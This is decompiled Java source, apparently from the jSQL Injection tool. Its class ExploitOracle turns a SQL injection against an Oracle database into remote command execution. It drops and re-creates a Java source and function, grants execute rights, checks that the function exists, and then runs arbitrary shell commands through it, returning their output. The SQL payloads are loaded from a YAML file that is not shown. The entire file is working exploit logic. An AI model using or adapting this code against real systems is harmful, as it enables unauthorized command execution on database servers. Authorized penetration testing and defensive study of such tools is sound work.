/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible.vendor;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.ExploitMode;
import com.jsql.model.accessible.vendor.oracle.ModelYamlOracle;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.util.LogLevelUtil;
import java.util.Arrays;
import java.util.UUID;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

public class ExploitOracle {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private final ModelYamlOracle modelYaml;
    private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
    private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";

    public ExploitOracle(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        Yaml yaml = new Yaml();
        this.modelYaml = yaml.loadAs(injectionModel.getMediatorVendor().getOracle().instance().getModelYaml().getResource().getExploit(), ModelYamlOracle.class);
    }

    public void createRce(ExploitMode exploitMode) throws JSqlException {
        if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains((Object)exploitMode)) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
        }
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getDropSource(), RCE_JAVA_UTIL_SRC), "body#drop-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getDropFunc(), RCE_JAVA_UTIL_FUNC), "body#drop-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddSource(), RCE_JAVA_UTIL_SRC, RCE_JAVA_UTIL_SRC), "body#add-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFunc(), RCE_JAVA_UTIL_FUNC, RCE_JAVA_UTIL_SRC), "body#add-func");
        this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");
        String nameDatabase = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getConfirm(), "%01%03%03%07", RCE_JAVA_UTIL_FUNC), "body#confirm");
        if (!nameDatabase.contains(RCE_JAVA_UTIL_FUNC)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
            return;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");
        Request request = new Request();
        request.setMessage(Interaction.ADD_TAB_EXPLOIT_UDF_ORACLE);
        request.setParameters(null, null);
        this.injectionModel.sendToViews(request);
    }

    public String runRceCmd(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getRunCmd(), RCE_JAVA_UTIL_FUNC, command.replace(" ", "%20"), "%01%03%03%07"), "udf#run-cmd");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        Request request = new Request();
        request.setMessage(Interaction.GET_TERMINAL_RESULT);
        request.setParameters(uuidShell, result);
        this.injectionModel.sendToViews(request);
        return result;
    }
}

